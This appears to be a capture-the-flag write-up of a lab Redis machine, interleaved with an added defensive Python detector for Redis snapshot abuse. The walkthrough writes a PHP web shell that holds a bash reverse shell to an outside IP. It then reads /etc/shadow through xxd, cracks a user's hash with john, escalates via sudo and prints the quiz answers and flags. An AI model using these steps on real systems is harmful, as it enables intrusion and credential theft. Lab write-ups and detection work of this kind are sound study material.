Ans: 2
Ans: redis
Ans: 6379
Ans: 6.0.7
Let’s connect with redis-cli using the syntax below:
redis-cli -h <Machine-IP>
We found a username, vianka, so let’s enumerate further.
redis-cli
config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save
2. Now, let’s start a netcat listener using the following command:
nc -lvp 4444
3. Then navigate to http://<Machine-IP>/shell.php
Ans: thm{red1s_rce_w1thout_credent1als}
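A defender's view of the sequence above, as an added example that is not part of the original write-up: a Python check over Redis MONITOR output that flags a SAVE issued after CONFIG SET has pointed dir at a sensitive directory or dbfilename at a non-.rdb name. The sample lines and the WATCHED_DIRS list are constructed assumptions, and the check also covers several settings passed in one CONFIG SET, which goes beyond the case shown here.

```python
import re

# Constructed MONITOR-style lines (timestamp [db client] "cmd" "arg" ...);
# sample data for this example, not captured from the machine in the write-up.
SAMPLE = r'''
1600000000.000001 [0 198.51.100.7:41000] "config" "set" "dbfilename" "dump.rdb"
1600000000.000002 [0 198.51.100.7:41000] "save"
1600000000.000003 [0 203.0.113.5:50000] "config" "set" "dir" "/var/www/html"
1600000000.000004 [0 203.0.113.5:50000] "config" "set" "dbfilename" "shell.php"
1600000000.000005 [0 203.0.113.5:50000] "set" "test" "<?php placeholder ?>"
1600000000.000006 [0 203.0.113.5:50000] "save"
'''.strip().splitlines()

LINE = re.compile(r'^(\d+\.\d+) \[\d+ ([^\]]+)\] (.*)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Assumption: directories where a stray snapshot file becomes executable or trusted.
WATCHED_DIRS = ("/var/www", "/etc/cron", "/var/spool/cron", "/.ssh")

def detect(lines):
    """Return (timestamp, client, reasons) for each snapshot written to a risky target."""
    state = {}    # CONFIG SET is server-wide: key -> (value, client that set it)
    alerts = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, client, rest = m.groups()
        args = ARG.findall(rest)
        cmd = [a.lower() for a in args[:2]]
        if cmd == ["config", "set"]:
            # Walk key/value pairs so several settings in one call are all seen.
            for key, value in zip(args[2::2], args[3::2]):
                if key.lower() in ("dir", "dbfilename"):
                    state[key.lower()] = (value, client)
        elif cmd[:1] in (["save"], ["bgsave"]):
            reasons = []
            d, d_by = state.get("dir", ("", None))
            f, f_by = state.get("dbfilename", ("", None))
            if any(w in d for w in WATCHED_DIRS):
                reasons.append(f"dir={d} set by {d_by}")
            if f and not f.lower().endswith(".rdb"):
                reasons.append(f"dbfilename={f} set by {f_by}")
            if reasons:
                alerts.append((ts, client, reasons))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

MONITOR reduces server throughput, so the same rule is better applied to whatever command audit source is already collected.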
On analysing GTFOBins, we found a binary that can read files with sudo permissions:
$ python3 -c "import pty; pty.spawn('/bin/bash')"
$ LFILE=/etc/shadow
$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
3. Now copy the hash of vianka and store it in a file named hash.txt on your system. (Make sure to check the hash if you paste it via the terminal.)
4. Now let’s use john to crack the password using the command below:
$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1 (vianka)
Session completed.
Ans: beautiful1
Switch to vianka with her password beautiful1 using the command su vianka, and let’s check what commands vianka can run.
2. She can run all commands, so let’s sudo it:
sudo su
cat /root/root.txt
Ans: thm{xxd_pr1v_escalat1on}